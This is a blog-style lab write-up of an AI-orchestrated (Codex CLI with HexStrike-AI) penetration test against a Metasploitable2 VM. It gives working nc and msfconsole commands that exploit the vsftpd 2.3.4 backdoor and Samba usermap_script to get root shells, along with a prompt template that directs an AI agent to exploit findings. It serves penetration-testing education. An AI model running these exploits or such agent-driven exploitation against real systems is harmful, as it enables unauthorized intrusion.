:::info Last tested Kali Linux 2025.4 · HexStrike AI (Kali package 2025.4 repo) · May 2026. Results may vary on other versions. :::

HexStrike+OpenAI Codex. AI-Driven Exploitation of Metasploitable.

How I Used an LLM-Orchestrated Toolchain to Enumerate and Exploit a Deliberately Vulnerable Host (With Real Proofs)

HexStrike+OpenAI Codex. AI-Driven Exploitation of Metasploitable.

How I Used an LLM-Orchestrated Toolchain to Enumerate and Exploit a Deliberately Vulnerable Host (With Real Proofs)

Introduction

AI-assisted penetration testing is no longer a concept — it is operational reality.

In this article, I walk through a real, authorized penetration test against my own lab host running Metasploitable2. I used an LLM-driven workflow (Codex CLI) orchestrating tool execution through HexStrike-AI to perform:

network discovery
enumeration and service fingerprinting
exploit selection and execution
proof collection (root-level command output)

This was not a simulation.

Real tools were executed.
Real vulnerabilities were validated.
And the target was compromised with unauthenticated root access — twice — via two independent attack paths.

Core Guides and Setup

HexStrike on Kali Linux 2025.4: A Comprehensive Guide

Focus: Initial setup and overview of the AI-powered offensive security framework.

HexStrike-AI: A Force Multiplier for Red Teams — and a Dangerous Shift in the Threat Landscape

Focus: Analysis of AI-orchestrated pentesting and its implications.

HexStrike MCP Orchestration with Ollama: Ubuntu Host, Kali VM, SSH Bridging, and Performance…

Focus: Technical architecture using Model Context Protocol (MCP) and local LLMs.

Practical Applications & Lab Comparisons

HexStrike + Gemini vs. HackerAI: “Ops Copilot” vs. “Chatbot with Tools”

Focus: Practical lab comparison of orchestration quality between different AI security tools.

AI-Driven Pentesting at Home: Using HexStrike-AI for Full Network Discovery and Exploitation

Focus: Step-by-step home lab application for network enumeration.

Specific Tooling & Technique Guides

What Is HexStrike-AI?

HexStrike-AI is not “another scanner.”

It is an orchestration layer that lets an LLM:

decide what security tools to run
execute them locally (or via SSH/MCP)
interpret outputs
adapt strategy dynamically (timeouts, missing tools, privilege constraints)
optionally run controlled exploitation with PoC evidence

In short:

The AI plans. HexStrike executes. Kali delivers the tools.

Test Scope & Authorization

This assessment was conducted under explicit authorization.

Scope

Target: 172.16.163.129
Environment: private home lab (Metasploitable2 VM)
Attacker: Kali Linux environment with Codex CLI + HexStrike MCP

The Prompt That Started Everything

This is the “pattern” that makes LLM-driven pentesting actually work: you must demand execution + evidence.

Example prompt structure (adapt it to your CLI):

Use the MCP server "hexstrike": Authorized pentest of 172.16.163.129  
Full service discovery  
Enumerate versions  
Identify vulnerabilities (by severity)  
Exploit critical findings  
Provide proofs (command output)

Key lesson:
If you want HexStrike to run tools, explicitly require tool execution and proof artifacts.

Phase 1: Reachability and Discovery

The first attempt targeted a wrong IP (172.16.59.129) and resulted in “host seems down.”

After correcting to:

172.16.163.129

The host responded immediately.

A fast top-ports discovery scan confirmed the target was up and exposed a broad attack surface.

Phase 2: Enumeration & Service Fingerprinting

Because the environment had constraints (root privileges not always available, tool timeouts), the workflow adapted:

switched from SYN scan (-sS) to TCP connect (-sT)
used bounded host timeouts
reduced version intensity when needed

Confirmed exposed services (high-level)

The target exposed multiple legacy services typical of Metasploitable2:

FTP (21)
SSH (22)
Telnet (23)
SMTP (25)
DNS (53)
HTTP (80)
RPCbind (111)
SMB (139/445)
rlogin/rsh (513/514)
NFS (2049)
FTP alt (2121)
MySQL (3306)
PostgreSQL (5432)
VNC (5900)
X11 (6000)
AJP (8009)

Host identity confirmation

The HTTP landing page provided a definitive marker:

curl -s http://172.16.163.129:80 | head -n 5

Output included:

<title>Metasploitable2 - Linux</title>

At this point, the test shifted from “general assessment” to “known vulnerable image validation” — meaning we should expect multiple published RCE paths.

Phase 3: Vulnerability Discovery (What Stood Out Immediately)

Two services were immediate critical flags due to known RCE history in this lab image:

vsftpd 2.3.4 (commonly backdoored in lab builds)
Samba 3.0.20 (classic usermap_script RCE path)

Rather than listing every CVE possible for every old service, the workflow focused on:

vulnerabilities with direct, reliable exploitability
minimal risk of destabilizing the host
clear PoC output validation

Phase 4: Exploitation (With Proofs)

Exploit #1 — vsftpd 2.3.4 backdoor (CVE-2011–2523) → Root

Why it worked

In the Metasploitable2 build, vsftpd is intentionally vulnerable. A crafted username containing :) triggers a backdoor listener (commonly on TCP/6200).

Step A — Trigger the backdoor

(printf "USER test:)\r\nPASS test\r\nQUIT\r\n"; sleep 1) | nc -nv -w 2 172.16.163.129 21

This confirmed:

FTP reachable
banner: 220 (vsFTPd 2.3.4)

Step B — Connect to backdoor shell and capture proof

printf "id\nuname -a\nwhoami\npwd\n" | nc -nv -w 3 172.16.163.129 6200

Proof (captured output):

 uid=0(root) gid=0(root)  
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux  
root  
/

Impact: Unauthenticated Remote Code Execution → root.

No persistence was deployed. No further actions were taken.

Exploit #2 — Samba usermap_script (CVE-2007–2447) → Root bind shell

Why it worked

Samba 3.0.20 has a well-known remote command execution vulnerability via the username map script feature. Metasploit automates exploitation.

Tooling nuance: why a bind shell was used

The first Metasploit run produced unstable command shell behavior (sessions closing quickly and command execution differences between session types). The workflow pivoted to a bind shell payload , which is often more reliable in constrained environments.

Step A — Launch exploit with bind netcat payload (binds on port 4446)

msfconsole -q -x 'use exploit/multi/samba/usermap_script; \  
set RHOSTS 172.16.163.129; set RPORT 139; \  
set payload cmd/unix/bind_netcat; \  
set LPORT 4446; set DisablePayloadHandler true; \  
exploit -z; exit -y'

Step B — Connect to bind shell and capture proof

printf "id\nuname -a\nwhoami\npwd\n" | nc -nv -w 3 172.16.163.129 4446

Proof (captured output):

 uid=0(root) gid=0(root)  
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux  
root  
/

Impact: Unauthenticated Remote Code Execution → root.

Final Results Summary

What was validated

Broad service exposure consistent with Metasploitable2
Two separate unauthenticated root compromises , each independently sufficient for full takeover:
vsftpd backdoor (TCP/6200)
Samba usermap_script (bind shell on TCP/4446)

What was intentionally not done

No persistence / backdoors
No credential harvesting
No data collection beyond proof commands
No lateral movement testing

This kept the test strictly PoC-focused.

Remediation Recommendations (Real-World Perspective)

Metasploitable2 is intentionally insecure. In real systems, the remediation playbook is clear.

Critical

Remove backdoored/vulnerable services immediately
Never expose training VMs on networks shared with real assets
Enforce segmentation (lab VLAN / host-only networks)

High

Remove legacy cleartext and trust-based services:
Telnet
rsh/rlogin
VNC / X11 (unless strictly controlled)
Restrict SMB exposure and enforce modern versions/configs

Medium

Disable obsolete crypto (SSLv2) and weak ciphers
Remove version banners and harden HTTP stack
Restrict AJP to localhost/internal networks only

Low

Reduce attack surface: firewall by default, allowlist by source
Continuous inventory and exposure monitoring

Why This Matters

This test highlights the real value of AI in offensive workflows:

AI did not “replace” pentesting skills.
It amplified them.

The LLM-driven workflow:

selected practical next steps
adapted to missing tools and privilege constraints
pivoted when sessions were unstable
still produced clean PoC artifacts

The operator still matters — but the mental overhead drops sharply.

Final Thoughts

HexStrike-AI is not a toy. Used correctly, it behaves like a junior pentester with perfect memory and infinite patience — executing exactly what you instruct and iterating until it gets results.

By Andrey Pautov on January 3, 2026.

Canonical link

Exported from Medium on May 15, 2026.